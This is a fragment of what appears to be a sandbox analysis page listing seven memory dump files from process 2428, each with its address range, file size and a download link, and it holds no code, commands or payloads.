memory/2428-12-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-11-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-9-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-1420-0x00000000713DD000-0x00000000713E8000-memory.dmp

Filesize
44KB

Download
memory/2428-1421-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2428-1442-0x00000000713DD000-0x00000000713E8000-memory.dmp

Filesize
44KB

Download